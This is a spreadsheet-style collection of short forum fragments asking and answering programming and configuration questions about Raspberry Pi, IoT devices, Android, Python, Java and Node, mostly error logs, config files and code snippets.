06-21 13:58:54.054 11499-11499/org.wso2.iot.agent E/APIController: com.android.volley.VolleyError: java.lang.SecurityException: Admin ComponentInfo{org.wso2.iot.agent/org.wso2.iot.agent.services.AgentDeviceAdminReceiver} does not own the device
How can i fix this isssue to make the application a device owner.</t>
  </si>
  <si>
    <t>I set the shell as True to allow wild cards, according to https://docs.python.org/2/library/subprocess.html
Results for out are:
'.\n./.Xauthority\n./.xsession-errors\n./Public\n./.dmrc\n./Downloads\n./test.sh\n./.idlerc\n./.idlerc/recent-files.lst\n./.idlerc/breakpoints.lst\n./.asoundrc\n./.bash_logout\n./.profile\n./Templates\n./Music\n./.bash_history\n./Videos\n./.local\n./.local/share\n./.local/share/gvfs-metadata\n./.local/share/gvfs-metadata/home\n./.local/share/gvfs-metadata/home-d6050e94.log\n./.local/share/applications\n./.local/share/recently-used.xbel\n./.local/share/Trash\n.....
And it continues to go on for awhile.</t>
  </si>
  <si>
    <t>(cv) pi@raspberrypi:~/Smart-Security-Camera $ sudo python3 main.py
Traceback (most recent call last):
  File "main.py", line 1, in &lt;module&gt;
    import cv2
ImportError: No module named 'cv2'
any help is appreciated</t>
  </si>
  <si>
    <t>and :
  mai 27 13:42:22 raspberrypi kernel: Voltage normalised (0x00000000)
mai 27 13:42:50 raspberrypi polkitd(authority=local)[810]: Registered Authentica
mai 27 13:42:54 raspberrypi polkitd(authority=local)[810]: Operator of unix-sess
mai 27 13:42:54 raspberrypi systemd[1]: Starting MariaDB 10.1.38 database server
-- Subject: L'unit (unit) mariadb.service a commenc  dmarrer
-- Defined-By: systemd
-- Support: https://www.debian.org/support
-- 
-- L'unit (unit) mariadb.service a commenc  dmarrer.</t>
  </si>
  <si>
    <t>Raspbian Wheezy:
Following was taken from eLinux.org RPi Debian Auto Login page:
Auto Login:
In Terminal:
Scroll down to:
and change to
#1:2345:respawn:/sbin/getty 115200 tty1
Under that line add:
1:2345:respawn:/bin/login -f pi tty1 &lt;/dev/tty1 &gt;/dev/tty1 2&gt;&amp;1
Ctrl+X to exit, Y to save followed by enter twice
Auto StartX (Run LXDE):
In Terminal:
sudo nano /etc/rc.local
Scroll to the bottom and add the following above exit 0:
su -l pi -c startx
Raspbian Jessie:
Use raspi-config.</t>
  </si>
  <si>
    <t>Errors screenshot:
This is the whole code:
AndroidManifest.xml:
IotCoreCommunicator Class
IotCorePasswordGenerator Class
    package cacaosd.com.sample1;
import android.content.res.Resources;
import android.util.Base64;
import java.io.IOException;
import java.io.InputStream;
import java.security.KeyFactory;
import java.security.NoSuchAlgorithmException;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
import java.time.Duration;
import java.time.Instant;
import java.util.Date;
import io.jsonwebtoken.JwtBuilder;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
class IotCorePasswordGenerator {
    private final String projectId;
    private final Resources resources;
    private final int privateKeyRawFileId;
    IotCorePasswordGenerator(String projectId, Resources resources, int privateKeyRawFileId) {
        this.projectId = projectId;
        this.resources = resources;
        this.privateKeyRawFileId = privateKeyRawFileId;
    }
    char[] createJwtRsaPassword() {
        try {
            byte[] privateKeyBytes = decodePrivateKey(resources, privateKeyRawFileId);
            return createJwtRsaPassword(projectId, privateKeyBytes).toCharArray();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("Algorithm not supported.</t>
  </si>
  <si>
    <t>WebSecurityConfig
If I comment out one line in configure method --.anyRequest().authenticated(), everything is fine
WebSocketConfig 
@Configuration
@EnableWebSocketMessageBroker
public class WebSocketConfig implements WebSocketMessageBrokerConfigurer {
    @Override
    public void configureMessageBroker(MessageBrokerRegistry config) {
        config.enableSimpleBroker("/commands", "/readings");
        config.setApplicationDestinationPrefixes("/esp");
    }
    @Override
    public void registerStompEndpoints(StompEndpointRegistry registry) {
        registry.addEndpoint("/gs-guide-websocket").withSockJS();
    }
}
AuthChannelInterceptorAdapter 
I receiving messages in preSend method only if Spring Security is turned off.</t>
  </si>
  <si>
    <t>So I tried this approach:
lstatus, lret = pcall(s:listen,7333)     -- protected call to listen
if lstatus then 
   print("starting UDP Server")
else
    print("UDP Server - listen returned:",lret)
end
Surprisingly, I get this result:
PANIC: unprotected error in call to Lua API (udpserver.lua:104: function arguments expected near ',')
So the Protected Call itself is unprotected.</t>
  </si>
  <si>
    <t>Update:
Instead of using SAS token like above code piece, the following code use shared access policy and key(SASL PLAIN):
    static string host = "[IOT_HUB_NAME].azure-devices.net";
    static int port = 5671;
    static string device_id = "[DEVICE_ID]";
    static string device_key = "[DEVICE_KEY]";
    private const string username_hublevel = "iothubowner@sas.root.</t>
  </si>
  <si>
    <t>Give your Swing GUI a public method, say public void getPortText(String text)
Within the Worker use a protected void process(List&lt;String&gt; chunks) method override.</t>
  </si>
  <si>
    <t>When using this approach, the implementing class must:
Provide a protected virtual void Dispose(bool disposing) function
Implement the interface and provide a Dispose() function, which calls Dispose(true)
Create a finalizer which calls Dispose(false)
The boolean disposing parameter is designed to designate the source of the function call.</t>
  </si>
  <si>
    <t>Here you tell the GPIO library to place any events into a thread safe Python queue, which is thread read out by a QThread which emits the Qt signal (Qt signals are definitely thread safe when used from QThreads)
from six.moves.queue import Queue
class RelayThread(QThread):
    event_detected = pyqtSignal(int)
    def __init__(self, *args, **kwargs):
        QThread.__init__(self, *args, **kwargs)
        self.queue = Queue()
        GPIO.add_event_detect(channel, GPIO.BOTH, callback=self.queue.put)
    def run(self):
        while True:
            self.event_detected.emit(self.queue.get())
class MainWindow(QMainWindow):
    def__init__(self, *args, **kwargs):
        QMainWindow.__init__(self, *args, **kwargs)
        self.relay_thread = RelayThread()
        self.relay_thread.event_detected.connect(self.on_gpio_event)
        self.relay_thread.start()
    @pyqtSlot(int)
    def on_gpio_event(self, channel):
        # your code here!</t>
  </si>
  <si>
    <t>I had to call this string in my Arduino code: 
POST /device_update/1?device[gauge]=240 HTTP/1.1
and in my config/routes.rb I put:
post "device_update/:id", to: "devices#update"
with DevicesController.rb containing:
class DevicesController &lt; ApplicationController
  skip_before_filter :verify_authenticity_token 
    //Until I figure out how to send an authenticity token from my Arduino
  ...
  def update
    @device = Device.find(params[:id])
    if @device.update_attributes(device_params)
      render @device
    else
      render 'edit'
    end
  end
  ...
  private
    def device_params
      params.require(:device).permit( :gauge )
    end
end</t>
  </si>
  <si>
    <t>* @param token Token to find
         * @param in Next byte from input stream
         * @return &lt;code&gt;true&lt;/code&gt; if token was found
         */
        private boolean readToken(byte[] token, byte in) {
            if (in == token[inBufPos++]) {
                if (inBufPos == token.length) {
                    // Synch token found
                    inBufPos = 0;
                    if (DEBUG) Log.d(TAG, "Token found");
                    return true;
                }
            } else {
                inBufPos = 0;
            }
            return false;
        }
        /**
         * Synches with Razor AHRS and sets parameters.</t>
  </si>
  <si>
    <t>I have tried the following:
npm i ws This gives me the ECONNRESET error (See below)
Curl https://registry.npmjs.org/
&amp; Curl https://registry.npmjs.org/ws
Both return the correct json response
Removing any proxy settings
    npm config rm proxy
    npm config rm https-proxy
    npm config set registry http://registry.npmjs.org/
Restarting etc
Full Error log:
npm i ws --save --verbose
npm info it worked if it ends with ok
npm verb cli [ '/home/pi/.nvm/versions/node/v8.16.0/bin/node',
npm verb cli   '/home/pi/.nvm/versions/node/v8.16.0/bin/npm',
npm verb cli   'i',
npm verb cli   'ws',
npm verb cli   '--save',
npm verb cli   '--verbose' ]
npm info using npm@6.4.1
npm info using node@v8.16.0
npm verb npm-session 0a9bedb5def7f4a1
npm timing stage:rollbackFailedOptional Completed in 6ms
npm timing stage:runTopLevelLifecycles Completed in 1146975ms
npm verb type system
npm verb stack FetchError: request to http://registry.npmjs.org/ws failed, reason: read ECONNRESET
npm verb stack     at ClientRequest.req.on.err (/home/pi/.nvm/versions/node/v8.16.0/lib/node_modules/npm/node_modules/node-fetch-npm/src/index.js:68:14)
npm verb stack     at emitOne (events.js:116:13)
npm verb stack     at ClientRequest.emit (events.js:211:7)
npm verb stack     at Socket.socketErrorListener (_http_client.js:401:9)
npm verb stack     at emitOne (events.js:116:13)
npm verb stack     at Socket.emit (events.js:211:7)
npm verb stack     at emitErrorNT (internal/streams/destroy.js:66:8)
npm verb stack     at _combinedTickCallback (internal/process/next_tick.js:139:11)
npm verb stack     at process._tickCallback (internal/process/next_tick.js:181:9)
npm verb cwd /home/pi/projects/picamera/node_server
npm verb Linux 4.19.37-v7+
npm verb argv "/home/pi/.nvm/versions/node/v8.16.0/bin/node" "/home/pi/.nvm/versions/node/v8.16.0/bin/npm" "i" "ws" "--save" "--verbose"
npm verb node v8.16.0
npm verb npm  v6.4.1
npm ERR!</t>
  </si>
  <si>
    <t>File "door_controllerTEST.py", line 47, in 
    main()
File "door_controllerTEST.py", line 43, in main
    if(authenticator.check(authInput.getInput())):
File "door_controllerTEST.py", line 30, in getInput
    return AuthToken("Andrew","1234")
TypeError: this constructor takes no arguments
Added in the extra _ to my AuthToken class and it was giving me a error that my pfio wasnt initialized yet.</t>
  </si>
  <si>
    <t>**** UPDATE ****
I've done as request in turning the command into an argument after doing some research however the result is no different and still returns a "non zero exit status 1"
    command =  "sudo mount -t cifs -o username="+username+" password="+password + " " + serverAddress+ " " + localpath        
    print(command)
    subprocess.check_output(command.split(), shell=False)</t>
  </si>
  <si>
    <t>Run:
Create the following files:
/etc/systemd/network/pan0.netdev
/etc/systemd/network/pan0.network
[Match]
Name=pan0
[Network]
Address=172.20.1.1/24
DHCPServer=yes
/etc/systemd/system/bt-agent.service
[Unit]
Description=Bluetooth Auth Agent
[Service]
ExecStart=/usr/bin/bt-agent -c NoInputNoOutput
Type=simple
[Install]
WantedBy=multi-user.target
/etc/systemd/system/bt-network.service
[Unit]
Description=Bluetooth NEP PAN
After=pan0.network
[Service]
ExecStart=/usr/bin/bt-network -s nap pan0
Type=simple
[Install]
WantedBy=multi-user.target
Then run 
sudo systemctl enable systemd-networkd
sudo systemctl enable bt-agent
sudo systemctl enable bt-network
sudo systemctl start systemd-networkd
sudo systemctl start bt-agent
sudo systemctl start bt-network
Finally to pair, run:
sudo bt-adapter --set Discoverable 1
Then, on the other device pair it and connect the network.</t>
  </si>
  <si>
    <t>Unzip zip files
Unzip password protected zip files 
Create new zip files 
Append to existing zip files
Zip files
Zip-up NSData instances.</t>
  </si>
  <si>
    <t>Get the device signature
Change format to match avrdude.conf
The signature is in the first line of avrdude's output:
| head -n1 
Extract the 6 signature digits:
| sed "s/^:[0-9A-F]\{8\}\([0-9A-F]\{6\}\)[0-9A-F]*/\1/g" 
Convert to lower case, insert "0x" and ","
| sed "s/\([0-9A-F]\{2\}\)\([0-9A-F]\{2\}\)\([0-9A-F]\{2\}\)/0x\L\1 0x\L\2 0x\L\3/g"
Extract corresponding id from avrdude.conf
Find all id lines plus our one signature line:
cat /etc/avrdude.conf 
| grep "\(\&lt;id\&gt;\|$SIGNATURE\)" 
Now extract the corresponding id line for our signature:
| grep -B 1 signature 
| head -n 1 
Finally, we remove everything besides the id:
| sed "s/.*\"\([a-z0-9]*\)\".</t>
  </si>
  <si>
    <t>I know the IP isn't bound, as running netstat -ln grep 3306 returns the following:
I have also made sure that MySQL is running
This is the Java code I've used:
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
public class SQL {
    //login credentials
    static String url = "jdbc:mysql://192.168.43.44:3306/";            //url to the sql server
    static String user = "phpmyadmin";        //user in the sql server
    static String password = "password";    //password for the user
    static String schema = "Home";     //schema used
    //new Result Set
    static ResultSet myRs;
    //exe
    public static void main(String []args) {
        try {
            //Connection (1)
            Connection myConn = DriverManager.getConnection(url+schema, user, password);
            //Statement (2)
            Statement myStmt = myConn.createStatement();
            //Execute SQL Query (3)
            myRs = myStmt.executeQuery("SELECT * FROM `RequestTemp`");
            //Process Result Set
            while (myRs.next()) {
                    System.out.println(myRs);
            }
        }
        catch(Exception exc) {
            exc.printStackTrace();
        }
    }
} 
Using this code, it was expected that the program would successfully connect and read from the table RequestTemp, but instead i get this error.</t>
  </si>
  <si>
    <t>I added a debug configuration to debug the application as root, therefore I added a script to the Beaglebone  and added the following lines: 
and made it executable: 
sudo chmod a+x /usr/local/sbin/gdbserver 
and see that in the file /etc/login.defs the lines 
ENV_SUPATH PATH= .... 
ENV_PATH   PATH= .... 
contain /usr/local/sbin.</t>
  </si>
  <si>
    <t>For example, testing Cryptogams SHA, which is hand written asm, in a shared object results in:
10419:     relocation processing: /home/test/libcryptopp-8.3.0.so.8 (lazy)
10419:     symbol=CRYPTOGAMS_armcaps;  lookup in file=/home/test/libcryptopp.so.8 [0]
10419:     binding file /home/test/libcryptopp.so.8 [0]: normal symbol `CRYPTOGAMS_armcaps'
/home/test/: error while loading shared libraries: /home/test/libcryptopp.so.8: unexpected reloc type 0x03
So I know the problem is with the CRYPTOGAMS_armcaps symbol.</t>
  </si>
  <si>
    <t>)',
            [request.form['title'], request.form['text']])
    g.db.commit()
    flash('New entry was successfully posted')
    return redirect(url_for('show_entries'))
@app.route('/login', methods=['GET', 'POST'])
def login():
    error = None
    if request.method == 'POST':
        if request.form['username'] != app.config['USERNAME']:
            error = 'Invalid username'
        elif request.form['password'] != app.config['PASSWORD']:
            error = 'Invalid password'
        else:
            session['logged_in'] = True
            flash('You were logged in')
            return redirect(url_for('show_entries'))
    return render_template('login.html', error=error)
@app.route('/logout')
def logout():
    session.pop('logged_in', None)
    flash('You were logged out')
    return redirect(url_for('show_entries'))
@app.route('/files')
def files():
  return render_template('files.html')
if __name__ == '__main__':
    app.run()
Here is my wsgi file
#!/usr/bin/python
Import sys
import logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0,"/var/www/Intranet_for_RPi/")
from Intranet_for_RPi import app as application
application.secret_key = 'key-gen-secret'
```
I have made the wsgi file executable.</t>
  </si>
  <si>
    <t>Tests for Windows Store app certification:
Crashes and hangs test
App manifest compliance test
Supported API test
Performance tests
App manifest resources test
Debug configuration test
File encoding test
Direct3D feature level test
App capabilities test
Windows Runtime metadata validation
Package Sanity tests
Resource Usage test
More details can be found at MSDN.</t>
  </si>
  <si>
    <t>Here is a code:
AWS lambda by default has a AWS_SESSION_TOKEN in process.env
You should use STS to assume role and use sessionToken from it
import v4 from 'aws-signature-v4' // ^1.3.0
import STS from 'aws-sdk/clients/sts'
const { IOT_ENDPOINT_HOST, IOT_ROLE_ARN } = process.env
const sts = new STS()
const createSocketUrl = async () =&gt; {
  const data = await sts
    .assumeRole({
      RoleArn: IOT_ROLE_ARN,
      RoleSessionName: `some-role-session-name`,
      DurationSeconds: 3600
    })
    .promise()
  return v4.createPresignedURL(
    'GET',
    IOT_ENDPOINT_HOST,
    '/mqtt',
    'iotdevicegateway',
    '',
    {
      key: data.Credentials.AccessKeyId,
      secret: data.Credentials.SecretAccessKey,
      sessionToken: data.Credentials.SessionToken,
      protocol: 'wss'
    }
  )
}
or if you don't want to use STS
import v4 from 'aws-signature-v4' // ^1.3.0
const { IOT_ENDPOINT_HOST, IOT_ACCESS_KEY_ID, IOT_SECRET_ACCESS_KEY } = process.env
const createSocketUrl = () =&gt; {
  const { AWS_SESSION_TOKEN } = process.env
  delete process.env['AWS_SESSION_TOKEN']
  const url = v4.createPresignedURL(
    'GET',
    IOT_ENDPOINT_HOST,
    '/mqtt',
    'iotdevicegateway',
    '',
    {
      key: IOT_ACCESS_KEY_ID,
      secret: IOT_SECRET_ACCESS_KEY,
      protocol: 'wss'
    }
  )
  process.env['AWS_SESSION_TOKEN'] = AWS_SESSION_TOKEN
  return url
}</t>
  </si>
  <si>
    <t>To have this added to your PATH automatically everytime you login, you can paste that PATH line at the end of your .bashrc file, which is at /home/pi/.bashrc</t>
  </si>
  <si>
    <t>The mosquitto.conf file was nonexistant when I first downloaded mosquitto, so I created it and used this:
Please tell me if I posted sensitive information: I am new to this  :)
c4message_size_limit 0
clientid bridgeawsiot2
persistence true
persistence_file mosquitto.db
persistence_location /var/mosquitto/
log_type all
connection_messages true
log_timestamp true
allow_anonymous true
password_file /etc/mosquitto/conf.d/users
allow_anonymous true
listener 9001 127.0.0.1
protocol websockets
connection_messages true
log_timestamp true
listener 1883
connection &lt;awsiot&gt;
address yl42kju76zjjodsbm6nfl4yycq.ap-northeast-1.es.amazonaws.com:8883 
topic /esp8266/Si7021/slack out 1
cleansession true
notifications false
start_type automatic
bridge_cafile /etc/mosquitto/certs/root-CA.crt
bridge_certfile /etc/mosquitto/certs/RAS-XD.cert.pem
bridge_keyfile /etc/mosquitto/certs/RAS-XD.private.key
Maybe the problem is the websockets thing?</t>
  </si>
  <si>
    <t>Here is the Script: #######TOP
#!/usr/bin/env python3.4
import dropbox
from dropbox.exceptions import ApiError, AuthError
import time
import datetime
import picamera
import sys, os
from time import sleep
import dropcamloop1
# Authorisation token
TOKEN = 'HERE IS YOUR ACCESS TOKEN'
# Format photo will be saved as e.g.</t>
  </si>
  <si>
    <t>Initially we used this code:
And eventually we got:
arduino object has no attribute 'IMAP4_SSL'
After some research we tried importing del ssl library:
But in this occasion we got this: 
Traceback (most recent call last):
  File "mail-processor.py", line 3, in &lt;module&gt;
  import ssl
File "/usr/lib/python2.7/ssl.py", line 60, in &lt;module&gt;
  import _ssl # if we can't import it, let the error propagate
ImportError: No module named _ssl
Well, any idea about this?</t>
  </si>
  <si>
    <t>In JavaScript the confirm method takes a single string parameter, the statement that the user is confirming, and return true/false for whether the user clicked 'OK' (true) or 'Cancel'/Close (false).</t>
  </si>
  <si>
    <t>; git clone https://github.com/foo/vendored /home/pi/go/src/github.com/foo/vendored
Cloning into '/home/pi/go/src/github.com/foo/vendored'...
fatal: could not read Username for 'https://github.com': terminal prompts disabled
package github.com/foo/vendored: exit status 128
Password: 
which does not help me a whole lot either.</t>
  </si>
  <si>
    <t>i've opened the AndroidAccessory.h in both libraries and i found that in  ArduinoADK-beta-00 contain all the methods in the older one but they are set to private so they can't be used , here is what inside the header file:
so as we can see the  method is still exsisted but its private and the read() is declared twice one in the private section like this:
 int read(void *buff, int len, unsigned int nakLimit = USB_NAK_NOWAIT);
and the other in public section like this 
 virtual int read(void);
so the question, how could I use the read() function?</t>
  </si>
  <si>
    <t>The vnc-server that does the work is x11vnc
Install x11vnc
Looks like it requires you to set up a password:
Test installation and connection
You can already start the vnc-server:
x11vnc -forever -usepw -display :0 -ultrafilexfer
Check the service is active and listening
$ sudo netstat -nlp | grep vnc
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      2575/x11vnc  
And connect from your Mac just opening Screen Sharing and introducing the Raspberry's ip:
Make x11vnc to start on boot
Config:
# ~/.config/autostart/x11vnc.desktop
[Desktop Entry]
Encoding=UTF-8
Type=Application
Name=X11VNC
Comment=
Exec=x11vnc -forever -usepw -display :0 -ultrafilexfer
StartupNotify=false
Terminal=false
Hidden=false
Be sure there is not problems to access to this file:
sudo chmod a+r ~/.config/autostart/x11vnc.desktop
Make the Raspberry to be visible in the sharing network of the Mac
sudo apt-get install netatalk
sudo apt-get install avahi-daemon
sudo update-rc.d avahi-daemon defaults
Config:
# /etc/avahi/services/afpd.service
&lt;?xml version="1.0" standalone='no'?&gt;&lt;!--*-nxml-*--&gt;
&lt;!DOCTYPE service-group SYSTEM "avahi-service.dtd"&gt;
&lt;service-group&gt;
   &lt;name replace-wildcards="yes"&gt;%h&lt;/name&gt;
   &lt;service&gt;
      &lt;type&gt;_afpovertcp._tcp&lt;/type&gt;
      &lt;port&gt;548&lt;/port&gt;
   &lt;/service&gt;
&lt;/service-group&gt;
Config 2:
# /etc/avahi/services/rfb.service
&lt;?xml version="1.0" standalone='no'?&gt;
&lt;!DOCTYPE service-group SYSTEM "avahi-service.dtd"&gt;
&lt;service-group&gt;
  &lt;name replace-wildcards="yes"&gt;%h&lt;/name&gt;
  &lt;service&gt;
    &lt;type&gt;_rfb._tcp&lt;/type&gt;
    &lt;port&gt;5900&lt;/port&gt;
  &lt;/service&gt;
&lt;/service-group&gt;
Restart service:
sudo /etc/init.d/avahi-daemon restart
Finding the Raspberry from your Mac
Using Finder into the section Shared &gt; All... should be your Raspberry.</t>
  </si>
  <si>
    <t>Here's how you could do it:
Virtualenv
Note that you code is probably not running inside a virtualenv right now, as made evidenced by the package paths (/usr/local/lib isn't your virtualenv):
"/usr/local/lib/python2.7/dist-packages/Django-1.5.4-py2.7.egg/django/contrib/auth/__init__.py"</t>
  </si>
  <si>
    <t>probes the platform driver
static int myPlattformDrv_probe(struct platform_device *pdev)
{
    struct TMyDrvDrvData *priv;
    int i,j,r,gpioNum, ret;
    KMSG_PINFO("probe my driver ...");
    priv = kzalloc(sizeof(*priv), GFP_KERNEL);
    if (!priv) {
        KMSG_PERR("Failed to allocate memory for the private data structure");
        return -ENOMEM;
    }
    priv-&gt;pdev = pdev;
    platform_set_drvdata(pdev, priv);
    TRACE("setup gpios ...");
    r = get_gpio(pdev, "pin1", &amp;gpioNum);
    if (r) {
        KMSG_PERR("Failed to find gpio \"pin1\" in device tree");
    }
    // save number
    priv-&gt;gpiod_pin1 = gpioNum;
    // create "pin1" debugfs entry
    debugfs_create_u32("pin1", S_IRUGO, gmyPlattformDrvDebugfsRootDir, &amp;priv-&gt;Pin1);
    r = get_gpio(pdev, "pin2", &amp;gpioNum);
    if (r) {
        KMSG_PERR("Failed to find gpio \"pin2\" in device tree");
    }
    // save number
    priv-&gt;gpiod_pin2 = gpioNum;
    // create "pin2" debugfs entry
    debugfs_create_u32("pin1", S_IRUGO, gmyPlattformDrvDebugfsRootDir, &amp;priv-&gt;Pin2);
    // create device class
    TRACE("create myCharDev char device class");
    // create char dev region
    ret = alloc_chrdev_region(&amp;gMyCharDev, 0, 1, "myCharDev");
    if( ret &lt; 0) {
        KMSG_PERR("alloc_chrdev_region error %i", ret);
        goto error;
    }
    // create device class
    if((gMyCharDevClass = class_create(THIS_MODULE, dSEK4DevClass)) == NULL)
    {
        KMSG_PERR("class_create error");
        goto error_classCreate;
    }
    if(NULL == device_create(gMyCharDevClass, NULL, gMyCharDev, NULL, "myCharDev"))
    {
        KMSG_PERR("device_create error");
        goto error_deviceCreate;
    }
    cdev_init(&amp;gMyCharDev_cdev, &amp;gMyCharDevOps);
    ret = cdev_add(&amp;gMyCharDev_cdev, gMyCharDev, 1);
    if(-1 == ret) {
        KMSG_PERR("cdev_add error %i", ret);
        goto error_device_add;
        return -1;
    }
    TRACE("added myCharDev char device");
    return 0;
// error handling block
error_std:
error_device_add:
    device_destroy(gMyCharDevClass, gMyCharDev);
error_deviceCreate:
    class_destroy(gMyCharDevClass);
error_classCreate:
    unregister_chrdev_region(gMyCharDev, 1);
error:
    return -1;
}</t>
  </si>
  <si>
    <t>Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Configuring certificates...
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Transparent gateway certificates not found, operating in quick start mode...
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Finished configuring certificates.</t>
  </si>
  <si>
    <t>Just use the command directly,  which is what is exec'd inside /usr/share/applications/libreoffice-impress.desktop, it will work fine and you won't have any worry about permissions:
check_call would be preferable when you want to call a process, if the process returns a non-zero exit status you will know as it will raise a CalledProcessError.</t>
  </si>
  <si>
    <t>Here is the full code as required:
require 'io/console'
loop do
    hidden_data = '{"hidden_data":"true"}'
    File.open('hidden_data.json', "w") {|file| file.puts hidden_data }
    puts "Insert your password:"
    password = STDIN.noecho(&amp;:gets).chomp
    if password == "1234"
        hidden_data = '{"hidden_data":"false"}'
        File.open('hidden_data.json', "w") {|file| file.puts hidden_data }
        puts "Access granted"
        sleep 60
    else
        puts "Wrong password"
    end
end</t>
  </si>
  <si>
    <t>I am trying to split string ,but unfortunately  behaves weirdly 
I have following string get|user=password|23|info|hello I have tried widely used method using strtok, but unfortunately it treats = as delimiter and I cannot parse my string.</t>
  </si>
  <si>
    <t>Here is my attempt with Subprocess:
import subprocess
subprocess.call("sshpass -p ######## scp test.txt pi@IP:/home/pi")
print"DONE"
Again I get no errors, but the file is not transferred
****EDIT #2****
So I found out that because sshpass is being used, scp isnt prompting me to add the IP to known hosts, as a result the file simply isnt trnasferred at all.</t>
  </si>
  <si>
    <t>The Revealing Module Pattern is an updated Module Pattern where you define all of your functions and variables in the private scope and return an anonymous object at the end of the module along with pointers to both the private variables and functions you wish to reveal as public.</t>
  </si>
  <si>
    <t>I have generated x509 certificate from aws console and kept it inside resources folder of spring boot project but calling lambda function throwing 
I have already tried following ways:
1) 
2) Added following resource tag in pom.xml inside build tag
    &lt;resources&gt;
        &lt;resource&gt;
            &lt;directory&gt;resources&lt;/directory&gt;
                &lt;targetPath&gt;${project.build.outputDirectory}&lt;/targetPath&gt;
                &lt;includes&gt;
                    &lt;include&gt;7913fa14e2-certificate.pem.crt&lt;/include&gt;
                    &lt;include&gt;7913fa14e2-private.pem.key&lt;/include&gt;
                &lt;/includes&gt;
        &lt;/resource&gt;
    &lt;/resources&gt;
3) My fields:
    private static final String certificateFile = "src/main/resources/7913fa14e2-certificate.pem.crt";
4) Code:
    File file = new File(certificateFile);
    if (!file.exists()) {
        System.out.println("Certificate file: " + filename + " is not found.</t>
  </si>
  <si>
    <t>I have created docker private registry and able to push and pull from other raspi in the same network( added the registry ip to insecure-registry option)
docker push registry-ip:5000/image
but when my registry server machine is restarted, I am not able to see the repository image and I need to again push the image to the registry host machine:
returns nothing
Why it is so?</t>
  </si>
  <si>
    <t>https://github.com/thisbejim/Pyrebase
Code that works for me:
import pyrebase
config = {
    'apiKey': "YYY",
    'authDomain': "XXXXXXXX.firebaseapp.com",
    'databaseURL': "https://XXXXXXXX.firebaseio.com",
    'projectId': "XXXXXXXX",
    'storageBucket': "XXXXXXXX.appspot.com",
    'messagingSenderId': "ZZZ",
}
firebase = pyrebase.initialize_app(config)
userEmail = 'youremailadresthatyouaddedtofirebasedatabaseauthenticatedusers'
userPass = 'yourpasswordsetupforthisemail'
auth = firebase.auth()
# Log the user in
user = auth.sign_in_with_email_and_password(userEmail, userPass)
# Get a reference to the database service
db = firebase.database()
# data to save
data = {
            "name": "Mortimer 'Morty' Smith"
            }
# Pass the user's idToken to the push method
results = db.child("test").push(data, user['idToken'])
print results
results = db.child("test").get(user['idToken'])
print results.val()</t>
  </si>
  <si>
    <t>Listing cameras
[]
Traceback (most recent call last):
  File "camtest.py", line 56, in &lt;module&gt;
    cam.start()
SystemError: Cannot identify '/dev/video0': 2, No such file or directory
Run 4:
Initialized pygame.</t>
  </si>
  <si>
    <t>Example:
The following annotations are commonly used in modern JSDoc, but the full list varies between implementations:
  Documents a method parameter; a datatype indicator can be added between  curly braces
@return Documents a return value
@constructor    Marks a function as a constructor
@deprecated Marks a method as deprecated
@private    Signifies that a method is private
@requires  Describe a required resource.</t>
  </si>
  <si>
    <t>Reproducible in any way (even if the  field is private or protected) and here is my example:
main.cc:
And here is what happens when compiling with:
g++ main.cc -Os -o main
and running with:
./main
the output is:
pi@pi:~/ $ ./main
A"~ &lt;-- this is random
345
asdasdad
34523
But when I enable optimization with -O0 or -O1 or -O2 ... the output is only a new line:
pi@pi:~/ $ ./main
pi@pi:~/ $
G++ version:
pi@pi:~/ $ g++ --version
g++ (Raspbian 6.3.0-18+rpi1) 6.3.0 20170516</t>
  </si>
  <si>
    <t>struct ConfigSettingsStruct
{
    String ssid;
    String password;
};
ConfigSettingsStruct ConfigSettings;
bool loadConfig() {
    File configFile = SPIFFS.open("/config.json", "r");
    if (!configFile) {
        Serial.println("Failed to open config file");
        return false;
    }
    size_t size = configFile.size();
    if (size &gt; 1024) {
        Serial.println("Config file size is too large");
        return false;
    }
    // Allocate a buffer to store contents of the file.</t>
  </si>
  <si>
    <t>line 11, in &lt;module&gt;
  isConnected = WifiHandler.Connect(ssid,password)
 File "/home/pi/WifiHandler.py", line 43, in Connect
    savedcell.activate()
 File "/usr/local/lib/python3.4/dist-packages/wifi/scheme.py", line 176. in activate
     return self.parse_ifup_output(ifup_output)
 File "/usr/local/lib/python3.4/dist-packages/wifi/scheme.py" line 183, in parse_ifuo_output
     raise ConnectionError("failed to connect to %r" % self)
     wifi.exceptions.ConnectionError: Failed to connect to Scheme(interface='wlan0',name ='SSIDName', options={'wpa-psk':'32nnj3323jej222n4n2n421353535353535353535353535353', 'wpa-ssid': 'SSIDName' , 'wireless-channel':'auto'})</t>
  </si>
  <si>
    <t>If the Perl system() call has the same permissions as running through the command line, then why can I execute the command in the command line, but COM4 access is restricted when I call the same EXE from Perl?</t>
  </si>
  <si>
    <t>*;
Serial port;
static String OAuthConsumerKey="kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxO";
static String OAuthConsumerSecret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
static String AccessToken= "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
static String AccessTokenSecret="Mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx5";
String[] searchedTweets = new String[50];
ConfigurationBuilder cb = new ConfigurationBuilder();
Twitter twitter;
void setup() {
  //Set the size of the stage, and the background to black.</t>
  </si>
  <si>
    <t>You can create this file by copying the certificate information from
  certs.c in the Azure IoT SDK for C. Include the lines -----BEGIN
  CERTIFICATE----- and -----END CERTIFICATE-----, remove the " marks at
  the beginning and end of every line, and remove the \r\n characters at
  the end of every line.</t>
  </si>
  <si>
    <t>Since package.el doesn't allow locking packages to certain version, MELPA packages will override those available from any other package source, so melpa.el package is provided which contains code to allow restricting packages to specific repositories.</t>
  </si>
  <si>
    <t>To do this from the command line, try the following steps:
and then after it's installed you need to edit the configuration:
